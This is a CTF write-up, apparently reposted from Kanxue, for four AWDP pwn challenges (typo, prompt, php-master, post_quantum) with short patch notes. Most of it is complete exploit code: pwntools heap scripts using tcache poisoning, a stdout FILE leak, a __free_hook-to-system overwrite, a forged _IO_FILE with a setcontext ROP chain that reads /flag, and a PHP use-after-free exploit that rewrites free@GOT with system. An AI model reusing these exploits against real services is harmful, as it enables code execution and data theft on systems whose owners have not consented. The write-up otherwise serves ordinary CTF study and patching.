awdp-pwn/typo awdp-pwn/打字错误
break
没有 show 功能,无法直接泄露地址:先用溢出给相邻块伪造一个大 size,让它 free 后进入 unsorted bin 并与一个已在 tcache 中的小块重叠,再通过重叠区域只覆写 tcache fd 的低 2 字节。`_IO_2_1_stdout_` 的低 12 位不受 ASLR 影响,只需猜第 4 个半字节(脚本里固定猜 0x2),成功率 1/16;猜中后下一次申请就落在 `_IO_2_1_stdout_-0x10` 附近,改 `_flags`/`_IO_write_base` 即可泄露 libc。猜错时进程崩溃,需要外层循环重连重试。
成功的情况下
最终脚本(注意:网页抽取丢失了缩进和反斜杠——`b'x00'`/`'x00'` 应为 `b'\x00'`,`�33[` 应为 ANSI 转义 `\033[`;第一行是多行内容被拼接在一起,其中的 `for i in range(100):` 是上面说的重试循环。)
# NOTE(review): this line is a collapsed extraction of several script lines
# that the page fused together: the `attack` host:port, the headers of
# start()/add()/rm()/edit() (their bodies appear further down), the
# `for i in range(100):` retry loop for the 1/16 guess, and a few main-flow
# statements (rm(4), add(2,0x70), add(8,0xF0), rm(7), add(6,0xe0), the
# `stdout` low-12-bit computation and the "/bin/sh" payload) whose original
# order is not recoverable from the page. Every `b'x00'` here lost its
# backslash and must read b'\x00'.
attack = '10.10.1.113 28142'.replace(' ',':') def start(argv=[], *a, **kw): #context(log_level = 'debug') def add(idx,size): def rm(idx): def edit(idx,size,text): for i in range(100): ru('>> ') pay = b'x00' * 0xF0 rm(4) stdout = (libc.sym['_IO_2_1_stdout_'] - 0x10) & 0x0FFF add(2,0x70) add(8,0xF0) rm(7) add(6,0xe0) pay = 0xF8 * '/' + '/bin/shx00' #gdb.attach(io,gdbscript=gdbscript) io.interactive() itr()from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
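# Thin wrappers around the pwntools tube `io` (created later by start()).
# Fixes relative to the published listing: the NUL fill byte must be the
# escape b'\x00' — the page shows b'x00', a three-byte string that makes
# bytes.ljust() raise TypeError — and the colour prefix is the ANSI escape
# '\033[' (ESC '['), which the page rendered as a replacement character.
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)
r = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rl = lambda: io.recvline()
itr = lambda: io.interactive()
# Unpack a short little-endian leak (e.g. 6 address bytes) as a 32/64-bit int.
uu32 = lambda x: u32(x.ljust(4, b'\x00'))
uu64 = lambda x: u64(x.ljust(8, b'\x00'))
ls = lambda x: log.success(x)
# lss('name') prints the module-level variable `name` in red hex. It eval()s
# the string it is given: fine for the hard-coded names used in this script,
# but never feed it anything derived from remote data.
lss = lambda x: ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))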
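binary = './pwn'


def start(argv=None, *a, **kw):
    """Open the target tube.

    args.GDB -> run under gdb with `gdbscript`; args.TAG=host:port -> that
    remote; args.REM -> the hard-coded `attack` target; otherwise a local
    process.  `argv` is extra argv for the local process (the published
    version used a shared mutable default `[]`; the behaviour is unchanged).
    The def header is restored from the collapsed first line of the listing.
    """
    if argv is None:
        argv = []
    if args.GDB:
        return gdb.debug(binary, gdbscript)
    if args.TAG:
        return remote(*args.TAG.split(':'))
    if args.REM:
        return remote(*attack.split(':'))
    return process([binary] + argv, *a, **kw)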
# Arch/OS/endianness are taken from the binary; log_level='debug' echoes
# every byte sent/received, which is noisy but useful when the 1/16 guess
# fails and the run has to be repeated.
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
# libc is resolved from the binary's dynamic dependencies, so every hard-coded
# offset below is only valid for that exact libc build.
libc = context.binary.libc
elf = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)
# PIE-relative breakpoints (`brva` is a plugin command — pwndbg provides it;
# adjust if another gdb front-end is used). The .format() call is a no-op:
# the script contains no {placeholders}.
gdbscript = '''
brva 0x001698
brva 0x01754
#continue
'''.format(**locals())
#import os
#os.systimport os
#io = remote(*attack.split(':'))
def add(idx, size):
    """Menu option 1: allocate chunk `idx` with `size` bytes.

    (Header restored from the collapsed first line of the listing; each
    sendlineafter() is the recvuntil()+sendline() pair of the original.)
    """
    sla('>> ', '1')
    sla(':', str(idx))
    sla(': ', str(size))
def rm(idx):
    """Menu option 2: free chunk `idx` (header restored from the collapsed line)."""
    sla('>> ', '2')
    sla(':', str(idx))
def edit(idx, size, text):
    """Menu option 3: write `text` into chunk `idx`, declaring `size` bytes.

    `text` is sent raw (no newline) after the final prompt, exactly like the
    original's send(). Header restored from the collapsed line.
    """
    sla('>> ', '3')
    sla(':', str(idx))
    sla(': ', str(size))
    sa(': ', text)
io = start([])
# Heap layout: chunk 0 is 0x90 (0x80 requested), chunks 1-5 are 0x100,
# chunks 6-7 are 0xF0.
add(0,0x80)
add(1,0xF0)
add(2,0xF0)
add(3,0xF0)
add(4,0xF0)
add(5,0xF0)
add(6,0xe0)
add(7,0xe0)
# Menu 3 (edit) on chunk 0 driven by hand: at the *size* prompt the script
# sends 0x90 bytes of 'A' followed by 0xFFFF instead of a number, then
# 'TEST' as content. Presumably this is the mis-passed snprintf argument
# the fix section talks about; what it does to chunk 0's neighbour is not
# visible from the listing — confirm under gdb.
sl('3')
ru(':')
sl('0')
ru(': ')
pay = b'A'* 0x90
pay += p64(0xFFFF)
s(pay)
ru(': ')
s('TEST')
# Forged size 0x4F1 = 4*0x100 + 0xF0 | PREV_INUSE appended to the same
# buffer and written through an oversized (0x200-byte) edit of chunk 1, so
# that one chunk appears to span the next four. Exactly where the size
# lands depends on the typo'd edit path — verify the overlap in gdb.
pay += p64(0x100*4+0xF1)
edit(1,0x200,pay)
# Chunk 3 goes into tcache first; freeing the oversized chunk 2 afterwards
# sends it to the unsorted bin, overlapping chunk 3's tcache entry.
rm(3)
rm(2)
# `stdout` = (_IO_2_1_stdout_ - 0x10) & 0xFFF, the ASLR-independent low 12
# bits; it is assigned in the collapsed first line of the listing.
lss('stdout')
# Carve a 0x80 chunk from the head of the unsorted chunk; the purpose of this
# exact size is not visible here (presumably positioning the remainder next
# to the overlapped tcache entry).
add(3,0x70)
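try:
    # Partial overwrite of the overlapped tcache fd: 0x1f8 bytes of filler
    # from chunk 1's data apparently reach the fd, then a 2-byte value whose
    # low 12 bits are the known part of _IO_2_1_stdout_-0x10 and whose upper
    # nibble (0x2) is a guess. Right 1 time in 16; on a miss the process
    # dies and the whole attempt must be repeated (the published script
    # wraps this in `for i in range(100):`).
    pay = b'\x00' * 0x1f8
    pay += p16(stdout + 0x2000)
    edit(1, len(pay), pay)
    add(9, 0xF0)
    # Classic stdout leak: _flags = 0xFBAD1800 with the three read pointers
    # zeroed and the low byte of _IO_write_base cleared, so the next write
    # dumps libc pointers from the FILE. The leading p64(0) pads up to the
    # _flags field — its size depends on where the chunk landed relative to
    # the struct; confirm under gdb if the leak comes out shifted.
    pay = p64(0)
    pay += p64(0xFBAD1800) + p64(0) * 3 + p8(0)
    edit(9, len(pay), pay)
    # The page showed 'x00'*8 here: a str without the escape never matches,
    # so the original would have hung on this recvuntil().
    io.recvuntil(b'\x00' * 8)
    # 2017664 (0x1EC980) is the offset of the leaked pointer inside the
    # remote libc build — recompute it for any other libc.
    libc_base = uu64(r(8)) - 2017664
    libc.address = libc_base
    free_hook = libc.sym['__free_hook']
    lss('libc_base')
    pause()
    # Same overlap trick, now pointing a tcache fd at __free_hook-0x10, then
    # writing system() into it through the returned chunk.
    rm(6)
    pay = 0x4f8 * b'\x00' + p64(free_hook - 0x10)
    edit(1, len(pay), pay)
    add(7, 0xe0)
    edit(7, 0x40, p64(0) + p64(libc.sym['system']))
    edit(1, len(pay), pay)
    # free() of the chunk that holds the "/bin/sh" string (written by a
    # statement in the collapsed first line) now calls system() on it.
    rm(2)
except Exception as exc:
    # A wrong nibble guess or a dropped connection ends up here. The
    # published script used a bare `except:` that also ate KeyboardInterrupt;
    # log the failure and close so the retry loop can reconnect.
    log.warning('attempt failed: %r', exc)
    io.close()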
fix
漏洞点:edit 路径里 snprintf 的参数写错了(题目名 typo 的由来),用户输入被当成了格式串/长度参数,既是格式化字符串漏洞,也让写入长度不再受堆块大小约束,从而造成堆溢出(从利用脚本看,在 size 提示处直接发送了 0x90 字节的数据)。
修复:把这处 snprintf 调用直接 nop 掉即可。AWDP 的补丁还要过 check,nop 之后要确认 add/edit 等正常功能不受影响;更稳妥的修法是改成正确的参数,并把写入长度限制在堆块大小之内。
awdp-pwn/prompt
break
协议用 protobuf 封装(每条消息为 4 字节长度前缀 + 序列化数据,见下面的 .proto)。漏洞是堆溢出:从利用脚本看,edit 按消息里的长度写入 heap_content,而不是按实际申请的堆块大小,所以一个 0x100 的块可以写入 0x110 以上的数据,覆盖到相邻块的 size 和 fd。
// Request schema for the "prompt" service. The exploit sends every request
// as a 4-byte little-endian length followed by one serialized pwn2 message.
syntax = "proto3";
package mypackage;
message pwn2 {
// Menu action as used by the exploit helpers: 1 = allocate, 2 = free,
// 3 = edit, 4 = show.
int32 option = 1;
// Requested allocation size / declared write length. Nothing in the schema
// ties it to the real chunk size — that is the overflow described above.
int32 chunk_sizes = 2;
// Index of the chunk slot the action applies to.
int32 heap_chunks_id = 3;
// Payload written into the chunk (its length is independent of chunk_sizes).
bytes heap_content = 4;
}
// protoc --python_out=. pwn2.proto   -> generates the pwn2_pb2 module the exploit imports
◆exp(同样,网页抽取丢失了缩进和反斜杠:`b'x00'` 应为 `b'\x00'`;第一行是多行内容拼接,其中包含 `import pwn2_pb2`、add() 的函数头、溢出用的 `pay = b'A' * 0x108 + p64(0x110 * 4 + 1)`、`orw_rop_addr = fake_IO_addr` 以及 `pay = flat({` 这一行。)
# NOTE(review): collapsed extraction of several script lines. Fragments that
# are needed below and appear only here: `import pwn2_pb2` (the protoc
# output), the header `def add(size, text=b'123', idx=0):` whose body is
# further down, the overflow buffer `pay = b'A' * 0x108 + p64(0x110 * 4 +1)`
# used by the first edit(1, ...), `orw_rop_addr = fake_IO_addr`, and the
# `pay = flat({` opener of the forged FILE. Some intermediate add/show/rm
# steps are listed here too; their order is not recoverable from the page.
# `attack` is empty: no remote target was configured in the published copy.
attack = ''.replace(' ',':') def start(argv=[], *a, **kw): #context(log_level = 'debug') import pwn2_pb2 # syntax = "proto3"; def add(size,text=b'123',idx=0): # 这里的堆块基本都是连续在一起的,后续溢出就方便很多 pay = b'A' * 0x108 + p64(0x110 * 4 +1) add(0x100, b'8') show(3) add(0x100, b'8') show(3) rm(2) add(0x100, b'7') # 模板orw 嗦 pay = flat({ gdb.attach(io,gdbscript) libc.address = libc_base orw_rop_addr = fake_IO_addr # ret to addr lss('libc_base') #pay = flat({ # libc.address = libc_basefrom pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
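# Thin wrappers around the pwntools tube `io` (created later by start()).
# Fixes relative to the published listing: the NUL fill byte must be the
# escape b'\x00' — the page shows b'x00', a three-byte string that makes
# bytes.ljust() raise TypeError — and the colour prefix is the ANSI escape
# '\033[' (ESC '['), which the page rendered as a replacement character.
s = lambda x: io.send(x)
sa = lambda x, y: io.sendafter(x, y)
sl = lambda x: io.sendline(x)
sla = lambda x, y: io.sendlineafter(x, y)
r = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rl = lambda: io.recvline()
itr = lambda: io.interactive()
# Unpack a short little-endian leak (e.g. 5 or 6 bytes) as a 32/64-bit int.
uu32 = lambda x: u32(x.ljust(4, b'\x00'))
uu64 = lambda x: u64(x.ljust(8, b'\x00'))
ls = lambda x: log.success(x)
# lss('name') prints the module-level variable `name` in red hex. It eval()s
# the string it is given: fine for the hard-coded names used in this script,
# but never feed it anything derived from remote data.
lss = lambda x: ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))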
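binary = './pwn'


def start(argv=None, *a, **kw):
    """Open the target tube.

    args.GDB -> run under gdb with `gdbscript`; args.TAG=host:port -> that
    remote; args.REM -> the hard-coded `attack` target (empty in this copy);
    otherwise a local process.  `argv` is extra argv for the local process
    (the published version used a shared mutable default `[]`; behaviour is
    unchanged). The def header is restored from the collapsed first line.
    """
    if argv is None:
        argv = []
    if args.GDB:
        return gdb.debug(binary, gdbscript)
    if args.TAG:
        return remote(*args.TAG.split(':'))
    if args.REM:
        return remote(*attack.split(':'))
    return process([binary] + argv, *a, **kw)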
# Arch/OS/endianness are taken from the binary; log_level='debug' echoes
# every byte sent/received (handy for checking the length-prefixed framing).
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
# libc is resolved from the binary's dynamic dependencies; all hard-coded
# offsets below (2169632, setcontext+61/+294, ...) are tied to that build.
libc = context.binary.libc
#elf = ELF(binary)
#print(context.binary.libs)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '192.168.31.251', 10808)
# PIE-relative breakpoints (`brva` is a plugin command — pwndbg provides it;
# adjust for another front-end). The .format() call is a no-op: there are
# no {placeholders} in the script.
gdbscript = '''
brva 0x1DEC
brva 0x01BD6
#continue
'''.format(**locals())
#import os
#os.systimport os
#io = remote(*attack.split(':'))
io = start([])
# Wire-format reminder (pwn2.proto, compiled with `protoc --python_out=.`
# into the pwn2_pb2 module used by the helpers below):
# package mypackage;
# message pwn2 {
# int32 option = 1;
# int32 chunk_sizes = 2;
# int32 heap_chunks_id = 3;
# bytes heap_content = 4;
# }
def add(size, text=b'123', idx=0):
    """Menu option 1 (allocate) — header restored from the collapsed first line.

    Waits for the prompt, then sends one pwn2 message framed as a 4-byte
    little-endian length followed by the serialized bytes.
    """
    ru('Your prompt >> ')
    req = pwn2_pb2.pwn2()
    req.option = 1
    req.chunk_sizes = size
    req.heap_chunks_id = idx
    req.heap_content = text
    blob = req.SerializeToString()
    print(hexdump(blob))
    s(p32(len(blob)) + blob)
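def _send_prompt(option, size, idx, text):
    """Wait for the menu prompt, then send one pwn2 request.

    Framing is a 4-byte little-endian length followed by the serialized
    message — the same for every option, so rm/edit/show share this helper
    instead of repeating the serialize-and-send sequence.
    """
    ru('Your prompt >> ')
    msg = pwn2_pb2.pwn2()
    msg.option = option
    msg.chunk_sizes = size
    msg.heap_chunks_id = idx
    msg.heap_content = text
    raw = msg.SerializeToString()
    print(hexdump(raw))
    s(p32(len(raw)) + raw)


def rm(idx, size=0, text=b'123'):
    """Menu option 2: free chunk `idx`.

    The main flow reads a leak right after rm(), so the service apparently
    prints the freed chunk's content (use-after-free read).
    """
    _send_prompt(2, size, idx, text)


def edit(idx, size=0, text=b'123'):
    """Menu option 3: write `text` into chunk `idx` declaring `size` bytes.

    The write is presumably bounded by the message, not the chunk — the
    main flow pushes 0x110+ bytes into a 0x100 chunk through this call.
    """
    _send_prompt(3, size, idx, text)


def show(idx, size=0, text=b'123'):
    """Menu option 4: print chunk `idx`.

    `size` is accepted for a uniform signature but ignored: the published
    script always sends chunk_sizes=1 here, and that is preserved.
    """
    _send_prompt(4, 1, idx, text)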
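# Eight 0x110 chunks back to back (the author notes they come out contiguous,
# which is what makes the overflow convenient).
for label in (b'1', b'2', b'3', b'4', b'5', b'6', b'7', b'8'):
    add(0x100, label)
# Overflow from chunk 1 into chunk 2's size field: 0x108 bytes of filler
# cover chunk 1's data and chunk 2's prev_size, then the size becomes
# 0x110*4+1 = 0x441 (PREV_INUSE set), so chunk 2 appears to span chunks 2..5.
# (This assignment sits in the collapsed first line of the published listing;
# without it `pay` is undefined at this point.)
pay = b'A' * 0x108 + p64(0x110 * 4 + 1)
edit(1, len(pay), pay)
# Freeing the oversized chunk sends it to the unsorted bin; the service
# prints the chunk afterwards, so the 6 address bytes of its fd (presumably
# a main_arena pointer) leak libc. 2169632 is the distance from that
# pointer to this libc's base — recompute for a different build.
rm(2)
ru(': ')
libc_base = uu64(r(6)) - 2169632
libc.address = libc_base
lss('libc_base')
# Free a 0x110 chunk into an empty tcache bin: with safe-linking its stored
# `next` is PROTECT_PTR(&next, NULL) = (&next >> 12), i.e. the mangling key,
# which also gives the 4 KiB page holding chunk 8 (used as the heap base).
rm(8)
ru(': ')
key = uu64(r(5))
heap_base = key << 0xC
# Rewrite chunk 2 as a plain 0x110 tcache-sized chunk whose fd is
# (key ^ _IO_2_1_stdout_): under safe-linking a forged fd must be
# pre-mangled with the key just leaked. The steps that make the allocator
# walk this fd (further add/show/rm calls) are only present in the collapsed
# first line of the listing.
pay = b'A' * 0x108 + p64(0x111)
pay += p64(key ^ libc.sym['_IO_2_1_stdout_'])
edit(1, len(pay), pay)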
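fake_IO_addr = libc.sym['_IO_2_1_stdout_']
# The open/read/write chain is later read() into the same address and
# executed from there (assignment recovered from the collapsed first line).
orw_rop_addr = fake_IO_addr
# Forged _IO_FILE written over _IO_2_1_stdout_. The vtable pointer at 0xd8
# is steered into _IO_wfile_jumps so that a stdout flush ends up calling the
# setcontext+61 gadget with rdi = this struct; the author's register
# annotations below are kept as written — verify them against the target
# libc's setcontext disassembly before reusing on another build.
pay = flat({
    0x00: ' sh;',
    0x18: libc.sym['setcontext'] + 61,
    0x20: fake_IO_addr,  # must be greater than the value at 0x18
    0x68: fake_IO_addr,  # rdi
    0x70: 0,  # rsi
    0x78: fake_IO_addr,  # rsi (2nd stage)
    0x88: fake_IO_addr + 0x8,  # rdx
    0x90: 0x400,  # rdx (2nd stage): read size
    0x98: 0x23,  # rdx
    0xa0: fake_IO_addr,  # new rsp
    0xa8: libc.sym['setcontext'] + 294,  # pushed as return address
    0xb0: libc.sym['read'],  # read() pulls the ROP chain in over the struct
    0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20,  # vtable
    0xe0: fake_IO_addr,  # _wide_data
}, filler=b'\x00')
# The 0x110 allocation whose fd was forged above now lands on stdout and
# the forged struct is written through it.
add(0x100, pay)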
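pause()
# open/read/write chain built from the remote libc (no system(): the flag
# file is read directly). setcontext leaves rsp at orw_rop_addr, so the
# chain is delivered with a plain sendline into the pending read().
libc_rop = ROP(libc)
rax = libc_rop.find_gadget(['pop rax', 'ret'])[0]
rdi = libc_rop.find_gadget(['pop rdi', 'ret'])[0]
rsi = libc_rop.find_gadget(['pop rsi', 'ret'])[0]
# Newer libcs only ship `pop rdx; pop rbx; ret`: m is the number of qwords
# the rdx gadget pops, and every rdx load below is padded with m values.
try:
    rdx = libc_rop.find_gadget(['pop rdx', 'ret'])[0]
    m = 1
except (TypeError, IndexError):
    # find_gadget() returns None when nothing matches, so the [0] raises
    # TypeError; the published script caught this with a bare `except:`.
    rdx = libc_rop.find_gadget(['pop rdx', 'pop rbx', 'ret'])[0]
    m = 2
syscall = libc_rop.find_gadget(['syscall', 'ret'])[0]
# The chain is 20 + 3*m qwords, so the path string appended after it lives
# at orw_rop_addr + 0xa0 + m*3*8 — keep this in sync if gadgets are added.
buf = orw_rop_addr + 0xa0 + m * 3 * 8
# open(buf, O_RDONLY, 0) via a raw syscall (rax = 2)
orw_rop = p64(rax) + p64(2) + p64(rdi) + p64(buf) + p64(rsi) + p64(0) + p64(rdx) + p64(0) * m + p64(syscall)
# read(3, buf, 0x100) — fd 3 assumes only stdin/stdout/stderr are open
orw_rop += p64(rdi) + p64(3) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100) * m + p64(libc.sym['read'])
# write(1, buf, 0x100)
orw_rop += p64(rdi) + p64(1) + p64(rsi) + p64(buf) + p64(rdx) + p64(0x100) * m + p64(libc.sym['write'])
# NUL-terminated path (the page showed b'x00' here — the escape was lost)
orw_rop += b'/flag'.ljust(0x10, b'\x00')
sl(orw_rop)
lss('key')
lss('heap_base')
itr()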
fix
修复思路:把 edit/add 实际写入的长度限制为该堆块的大小;作者的做法是把申请的堆块改大,使消息里可能出现的最大写入长度不会越界。只改大堆块是权宜之计,补上边界检查才是根本修复。
awdp-pwn/php-master
break
// Break-side probe of vuln.so's API: a 4-slot table, four 0x40-byte chunks,
// each filled with a distinct byte pattern so they can be told apart in a
// heap dump and after free().
construct(4);
allocate(0, 0x40);
allocate(1, 0x40);
allocate(2, 0x40);
allocate(3, 0x40);
overwrite(0,str_repeat("A",0x40));
overwrite(1,str_repeat("B",0x40));
overwrite(2,str_repeat("C",0x40));
overwrite(3,str_repeat("D",0x40));
clear() free 掉堆块后没有把槽位里的指针置空,悬垂指针仍然保留,存在 UAF。
clear() 之后仍可通过 overwrite() 写已释放的块,改写 tcache 的 next 指针(libc-2.28 没有 safe-linking,直接写目标地址即可)就能让后续 allocate() 返回任意地址,这里指向 vuln.so 的 free@GOT。
◆exploit(网页抽取把函数头和几条顶层语句挤到了第一行,并丢失了反斜杠:`"x00"` 应为 `"\x00"`,`"n"` 应为 `"\n"`,正则里的路径分隔符原本应为 `\/`,否则 preg_match_all 会报 Unknown modifier。)
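<?php
// Exploit for vuln.so, rebuilt from the collapsed published listing (the
// function headers and the top-level leak()/$free_got lines were fused onto
// one line). Extension API used: construct(n), allocate(idx, size),
// overwrite(idx, data), clear(). clear() frees the chunks but leaves the
// slot pointers dangling — that use-after-free is what the chain abuses.
$heap_base = 0;
$libc_base = 0;
$libc = "";
$mbase = "";

/** Little-endian 64-bit unpack of a leaked byte string. */
function u64($leak) {
    $leak = strrev($leak);
    $leak = bin2hex($leak);
    $leak = hexdec($leak);
    return $leak;
}

/**
 * Little-endian 64-bit pack. pack('P') replaces the published
 * dechex/hex2bin/strrev/str_pad chain, which returns garbage when dechex()
 * yields an odd number of digits (hex2bin() then returns false) and, as
 * printed, padded with the literal text "x00" instead of NUL bytes.
 */
function p64($addr) {
    return pack('P', $addr);
}

/** Output-buffer callback: extract the libc and vuln.so base addresses from /proc/self/maps. */
function leakaddr($buffer) {
    global $libc, $mbase;
    // '#' delimiters so the unescaped '/' in the paths cannot terminate the
    // pattern early (the published '/.../' form needs every slash as '\/').
    // Adjust the libc filename to whatever the target really maps.
    //$p = '#([0-9a-f]+)-[0-9a-f]+ .* /usr/lib/x86_64-linux-gnu/libc.so.6#';
    $p = '#([0-9a-f]+)-[0-9a-f]+ .* /lib/x86_64-linux-gnu/libc-2.28.so#';
    $p1 = '#([0-9a-f]+)-[0-9a-f]+ .* /usr/local/lib/php/extensions/no-debug-non-zts-20210902/vuln.so#';
    preg_match_all($p, $buffer, $libc);
    preg_match_all($p1, $buffer, $mbase);
}

/** Read /proc/self/maps through an output buffer and set $libc_base / $module_base. */
function leak() {
    global $libc_base, $module_base, $libc, $mbase;
    // ob_start() sits here in the collapsed line; it must precede the
    // include() so ob_get_contents() has something to return.
    ob_start("leakaddr");
    include("/proc/self/maps");
    $buffer = ob_get_contents();
    ob_end_flush();
    leakaddr($buffer);
    if (empty($libc[1]) || empty($mbase[1])) {
        // Without this the bases silently become 0 and the later writes
        // crash the worker instead of telling you the patterns are wrong.
        die("maps leak failed: check the libc / vuln.so patterns\n");
    }
    $libc_base = hexdec($libc[1][0]);
    $module_base = hexdec($mbase[1][0]);
    echo dechex($libc_base);
    echo "\n";
    echo dechex($module_base);
    echo "\n";
}

leak();
// Build-specific offsets: free@GOT inside vuln.so and system() in this
// libc-2.28 — recompute both for any other build.
$free_got = $module_base + 0x4060;
$system = $libc_base + 0x44af0;

// tcache poisoning through the dangling slot pointers: clear() frees the
// chunks but keeps the pointers, so overwrite(1, ...) writes into a freed
// 0x50 chunk and replaces its tcache `next` with free@GOT (no safe-linking
// on 2.28, so the raw address works).
construct(4);
allocate(0, 0x40);
allocate(1, 0x40);
allocate(2, 0x40);
clear();
overwrite(1, p64($free_got));
// Re-allocate from the poisoned bin; slot 1 is intended to alias free@GOT.
construct(4);
allocate(0, 0x40);
allocate(1, 0x40);
// Slot 0 holds the command, slot 1 (free@GOT) is repointed to system(), so
// the free() done by clear() becomes system("/readflag>/var/www/html/flag").
overwrite(0, "/readflag>/var/www/html/flag\x00");
overwrite(1, p64($system));
clear();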
◆调试窗口(本机 gdb 连接容器内的 gdbserver。注意容器默认不允许关闭 ASLR——见下面的 `Operation not permitted`——每次启动时 libc/模块基址都会变化,所以 exp 里必须从 /proc/self/maps 动态读取基址。)
gdb -ex "target remote 172.17.0.2:1234"
◆在 docker 里启动 gdbserver(容器里没有,把本地的 gdbserver 连同它依赖的 libc.so.6、ld-linux-x86-64.so.2、libstdc++ 等一起拷进容器,否则会像下面 ldd 输出那样报 `GLIBC_2.35 not found` 的版本不匹配)
root@c723767b2eff:/var/www/html/gdbserver# ls
exp.php gdbserver ld-linux-x86-64.so.2 libc.so.6 libgcc_s.so.1 libm.so.6 libstdc++.so.6
root@c723767b2eff:/var/www/html/gdbserver# ldd gdbserver
./gdbserver: /lib64/ld-linux-x86-64.so.2: version `GLIBC_2.35' not found (required by ./libc.so.6)
linux-vdso.so.1 (0x000074b743b0d000)
libstdc++.so.6 => ./libstdc++.so.6 (0x000074b743834000)
libgcc_s.so.1 => ./libgcc_s.so.1 (0x000074b743804000)
libc.so.6 => ./libc.so.6 (0x000074b7435e4000)
libm.so.6 => ./libm.so.6 (0x000074b7434f1000)
./ld-linux-x86-64.so.2 => /lib64/ld-linux-x86-64.so.2 (0x000074b743b0f000)
root@c723767b2eff:/var/www/html/gdbserver# ./gdbserver :1234 php -S 0:8080 exp.php
gdbserver: Error disabling address space randomization: Operation not permitted
Process php created; pid = 90
Listening on port 1234
◆运行 ee.sh
docker cp exp.php c72:/var/www/html/gdbserver/ # exp.php 传到 docker 里面
curl http://172.17.0.2:8080/exp.php # 然后访问触发
fix
修复:作者把申请的堆块大小固定成一个大 size(推测是让它脱离 tcache/fastbin 范围,伪造的 next 指针不再被直接当作下一个可分配块)。更彻底的修复是在 clear()/free 之后把槽位指针置 NULL,并让 overwrite()/allocate() 拒绝操作已释放的槽位。
awdp-pwn/post_quantum
break
(作者未分析该题。)
fix
修复:把允许的 idx 上界改小(推测是索引检查越界,缩小 idx 范围即可挡住越界读写;改完同样要确认正常功能通过 check)。
看雪ID:imLZH1 https://bbs.kanxue.com/user-home-987517.htm
原文始发于微信公众号(看雪学苑):CCB_CISCN_半决赛-AWDP-pwn 题解